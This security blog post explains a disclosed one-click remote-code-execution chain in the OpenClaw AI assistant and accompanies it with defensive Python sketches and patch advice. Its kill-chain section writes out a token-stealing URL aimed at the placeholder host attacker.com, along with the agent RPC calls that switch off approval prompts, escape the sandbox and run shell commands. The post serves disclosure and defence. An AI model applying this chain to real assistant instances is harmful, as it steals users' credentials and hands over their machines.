When you grant an AI assistant “god mode” permissions—access to your messages, your API keys, your shell—the margin for error doesn’t just shrink. It vanishes entirely.

OpenClaw (formerly MoltBot and ClawdBot) has rapidly become one of the most popular open-source AI personal assistants, trusted by over 100,000 developers to manage their digital lives. But that trust came with a hidden cost: a critical vulnerability chain that could turn a single click into complete system compromise.

Security researchers at depthfirst recently disclosed a devastating 1-click Remote Code Execution (RCE) exploit. The attack required no user interaction beyond visiting a malicious webpage. No prompts. No approvals. Just instant, silent takeover.

Let’s dissect exactly how this worked—and what it means for anyone running agentic AI platforms.



The Vulnerability Trio

The exploit chained together three separate weaknesses that, in isolation, might seem benign:

1. Blind Gateway URL Ingestion

OpenClaw’s app-settings module read a gatewayUrl query parameter from the page URL and persisted it to storage without any validation. Loading https://localhost?gatewayUrl=attacker.com was enough to reconfigure your assistant to connect to a malicious server.
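Here is a minimal Python sketch that contrasts the flawed pattern with a guarded one. It is not OpenClaw’s code. The function names, the settings dictionary, and the confirm callback are all hypothetical. The guarded version mirrors the idea behind the eventual fix (ask the user before switching gateways) and adds a basic scheme check.

```python
from typing import Callable
from urllib.parse import parse_qs, urlparse

# Hypothetical sketch: neither function is OpenClaw's actual implementation.


def ingest_vulnerable(page_url: str, settings: dict) -> dict:
    """Flawed pattern: persist whatever gatewayUrl the page URL carries."""
    updated = dict(settings)
    params = parse_qs(urlparse(page_url).query)
    if "gatewayUrl" in params:
        updated["gatewayUrl"] = params["gatewayUrl"][0]  # no validation at all
    return updated


def ingest_guarded(page_url: str, settings: dict,
                   confirm: Callable[[str], bool]) -> dict:
    """Guarded pattern: ignore non-WebSocket URLs and require explicit user approval."""
    updated = dict(settings)
    params = parse_qs(urlparse(page_url).query)
    if "gatewayUrl" not in params:
        return updated
    candidate = params["gatewayUrl"][0]
    if urlparse(candidate).scheme not in ("ws", "wss"):
        return updated  # not a WebSocket URL: leave settings untouched
    if confirm(candidate):  # e.g. a modal asking "Connect to <candidate>?"
        updated["gatewayUrl"] = candidate
    return updated
```

Given the hook URL from Step 1 below, ingest_vulnerable silently switches the gateway to ws://attacker.com:8080. ingest_guarded leaves it unchanged unless confirm returns True. A confirmation prompt still relies on the user’s judgment: it stops the silent switch, but a user who approves an attacker’s URL is still exposed.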

2. Automatic Token Transmission

As soon as the setting changed, the client connected to the new gateway and automatically included the security-sensitive authToken in the handshake. No confirmation. No validation.
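One way to frame this flaw is that the token was not bound to any particular destination. The Python sketch below contrasts a handshake builder that attaches the token unconditionally with one that attaches it only when the gateway matches the origin the token was issued for. The message fields and the notion of a recorded "token origin" are assumptions for illustration. The source describes the actual fix as a confirmation modal, not origin binding.

```python
from urllib.parse import urlparse

DEFAULT_PORTS = {"ws": 80, "wss": 443, "http": 80, "https": 443}


def origin_of(url: str) -> tuple:
    """Reduce a URL to (scheme, host, port), filling in the default port if absent."""
    p = urlparse(url)
    return (p.scheme, p.hostname, p.port or DEFAULT_PORTS.get(p.scheme))


def handshake_unbound(gateway_url: str, auth_token: str) -> dict:
    """Flawed pattern: the token goes to whichever gateway is configured."""
    return {"type": "connect", "gateway": gateway_url, "authToken": auth_token}


def handshake_bound(gateway_url: str, auth_token: str, token_origin: str) -> dict:
    """Hypothetical hardening: attach the token only to the gateway it was issued for."""
    msg = {"type": "connect", "gateway": gateway_url}
    if origin_of(gateway_url) == origin_of(token_origin):
        msg["authToken"] = auth_token
    return msg
```

With binding in place, repointing the gateway to ws://attacker.com:8080 would produce a handshake that carries no token at all. Comparing scheme, host, and port together follows the same notion of "origin" that browsers use.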

3. Weak Origin Policy (CSWSH)

OpenClaw’s WebSocket server did not validate the Origin header and accepted connections from any site. This enabled Cross-Site WebSocket Hijacking (CSWSH): a victim’s browser could act as a pivot point to reach a localhost instance that is otherwise unreachable from the internet.
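A server-side Origin check is the standard defense against CSWSH. Below is a minimal Python sketch of the decision logic, independent of any WebSocket library. The allowlisted origins for the local UI are an assumption, so substitute wherever your UI is actually served from. RFC 6455 requires browser clients to send an Origin header on the opening handshake, and that requirement is what makes this check meaningful. Non-browser clients can send any value or none at all, so the check complements token authentication rather than replacing it.

```python
from typing import Mapping

# Assumption: the trusted UI is served from these origins. Adjust for your setup.
ALLOWED_ORIGINS = frozenset({"http://localhost:18789", "http://127.0.0.1:18789"})


def accept_websocket_upgrade(headers: Mapping[str, str]) -> bool:
    """Decide whether to accept a WebSocket opening handshake based on its Origin."""
    # HTTP header names are case-insensitive, so normalize them before lookup.
    normalized = {name.lower(): value for name, value in headers.items()}
    origin = normalized.get("origin")
    if origin is None:
        # Browsers always send Origin on WebSocket handshakes, so this request
        # almost certainly came from a non-browser client. This sketch rejects it;
        # a deployment with trusted CLI clients might choose differently.
        return False
    return origin in ALLOWED_ORIGINS
```

In the kill chain that follows, the attacker’s page connects to ws://localhost:18789 and the browser stamps the attacker’s own origin into the header. An exact-match allowlist like this one would refuse that connection even though the stolen token is valid.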

The 4-Step Kill Chain

Here’s how an attacker weaponized these flaws into a complete takeover:

Step 1: The Hook

The victim clicks a malicious link (or visits a compromised site), and a background window opens to http://victim-openclaw.com?gatewayUrl=ws://attacker.com:8080.

Step 2: Token Theft

The victim’s browser automatically sends the auth token to the attacker’s server during the gateway handshake.

Step 3: Local Pivot

Using Cross-Site WebSocket Hijacking, attacker JavaScript running in the victim’s browser connects to ws://localhost:18789—the default OpenClaw server—using the stolen token.

Step 4: Full Takeover

With operator-level access, the attacker:

- Disables user confirmation prompts: exec.approvals.set (ask: "off")

- Escapes any sandbox: config.patch (host: "gateway")

- Executes arbitrary commands: node.invoke (cmd: "bash -c '...'")
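Each of these three calls is distinctive, which also makes them a reasonable starting point for detection. The sketch below scans already-parsed RPC records for the calls listed above. The record shape (a method name plus a flat params dictionary) is an assumption. OpenClaw’s real payloads may nest these fields differently, so treat the matching rules as hypothetical.

```python
# Hypothetical record shape: {"method": str, "params": dict}


def flag_takeover_calls(records: list) -> list:
    """Return a human-readable finding for each call matching the takeover pattern."""
    findings = []
    for rec in records:
        method = rec.get("method")
        params = rec.get("params") or {}
        if method == "exec.approvals.set" and params.get("ask") == "off":
            findings.append("approval prompts disabled")
        elif method == "config.patch" and params.get("host") == "gateway":
            findings.append("execution host switched to gateway (sandbox bypass)")
        elif method == "node.invoke" and "cmd" in params:
            findings.append(f"command invoked: {params['cmd']}")
    return findings
```

Any single finding deserves a closer look. All three in quick succession from an unfamiliar connection match the kill chain described here.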

Total time from click to compromise: milliseconds.

What’s At Risk?

If you were running a vulnerable OpenClaw instance, an attacker could have accessed:

- Messaging Platforms: Slack, WhatsApp, Discord, iMessage—read and send as you

- Financial Keys: Stripe API tokens, payment processor credentials

- Full Shell Access: Complete control over the host machine

- Cloud Infrastructure: AWS, GCP, Azure credentials stored in configs

- Password Managers: Any secrets your assistant had access to

This isn’t theoretical. This is what “god mode” permissions look like when they fall into the wrong hands.

The Fix

The OpenClaw team responded quickly with a patch that adds a gateway URL confirmation modal, eliminating the auto-connect-without-prompt behavior that enabled this attack.

Patch Status: Fixed in v2026.1.24-1 and later.
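To check whether an installed build predates the fix, a version comparison has to decide how to order a suffix like -1. The sketch below treats that suffix as a post-release revision, so a plain 2026.1.24 counts as unpatched. That reading is an assumption. If the project follows SemVer pre-release semantics instead, the ordering of 2026.1.24 and 2026.1.24-1 flips. How you obtain the installed version string is left open.

```python
import re

PATCHED_VERSION = "v2026.1.24-1"


def parse_version(version: str) -> tuple:
    """Parse 'vYYYY.M.D' or 'vYYYY.M.D-N' into a comparable tuple of ints.

    Assumption: '-N' is a post-release revision, so 2026.1.24 < 2026.1.24-1.
    Under SemVer, a hyphen suffix would instead mark a pre-release.
    """
    match = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:-(\d+))?", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    year, month, day, revision = match.groups()
    return (int(year), int(month), int(day), int(revision or 0))


def needs_upgrade(installed: str) -> bool:
    """True if the installed version sorts before the patched release."""
    return parse_version(installed) < parse_version(PATCHED_VERSION)
```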

GitHub Advisory: GHSA-g8p2-7wf7-98mq

What You Need to Do Right Now

- Update Immediately: If you’re running any version prior to v2026.1.24-1, upgrade now.

- Rotate Your Tokens: If you suspect your instance was exposed, assume your auth tokens are compromised. Rotate everything.

- Audit Your Permissions: Review what services your AI assistant has access to. Does it really need full shell access? Does it need your Stripe keys?

- Check Your Logs: Look for unexpected gateway connections or unusual command executions in your OpenClaw logs.

- Avoid Suspicious Links: Until you’ve patched, treat any link from untrusted sources as potentially hostile.
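For the log check, one simple approach is to pull every gateway URL the client connected to out of your logs and flag any host you did not expect. Extracting those URLs depends on your log format, which is not covered here. A minimal Python sketch, assuming a local-only setup where the gateway should always be localhost:

```python
from typing import Iterable
from urllib.parse import urlparse


def unexpected_gateways(gateway_urls: Iterable[str],
                        expected_hosts: frozenset = frozenset({"localhost", "127.0.0.1"})) -> list:
    """Return every gateway URL whose host is not in expected_hosts."""
    flagged = []
    for url in gateway_urls:
        # hostname is lowercased by urlparse, and is None for scheme-less values
        # such as "attacker.com", so those get flagged too.
        host = urlparse(url).hostname
        if host not in expected_hosts:
            flagged.append(url)
    return flagged
```

If you deliberately run a remote gateway, add its hostname to expected_hosts rather than loosening the check.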

The Bigger Picture

This vulnerability is a wake-up call for the entire agentic AI ecosystem. We’re building assistants that hold the keys to our digital kingdoms, and the security model hasn’t caught up.

Traditional application security assumes humans are in the loop for sensitive operations. Agentic AI breaks that assumption. When your assistant can autonomously execute commands, access APIs, and interact with services, every vulnerability becomes amplified.

The OpenClaw team deserves credit for their rapid response. But as an industry, we need to move toward Agentic Zero Trust—treating every capability as a potential attack surface, implementing least-privilege by default, and assuming compromise is always one click away.

Because, as this vulnerability proved, it literally can be.
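"Least-privilege by default" can be made concrete as a deny-by-default capability check. The Python sketch below is one hypothetical shape for it. The capability names are invented for illustration and do not correspond to OpenClaw settings. Anything not explicitly granted is refused, and sensitive grants still require a human to approve each use.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class CapabilityPolicy:
    """Deny-by-default: a capability is usable only if explicitly granted."""
    granted: frozenset = frozenset()
    needs_confirmation: frozenset = frozenset()

    def check(self, capability: str, user_confirmed: bool = False) -> bool:
        if capability not in self.granted:
            return False  # never granted: always denied
        if capability in self.needs_confirmation and not user_confirmed:
            return False  # granted, but a human must approve each use
        return True


# Hypothetical capability names, for illustration only.
policy = CapabilityPolicy(
    granted=frozenset({"slack.read", "shell.exec"}),
    needs_confirmation=frozenset({"shell.exec"}),
)
```

Freezing the policy object only prevents in-process reassignment. The lesson of Step 4, where the attacker’s first move was to switch approvals off, is that policy changes also need to stay out of reach of the same remote channel an attacker might hijack.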

Stay secure. Stay patched. Stay paranoid.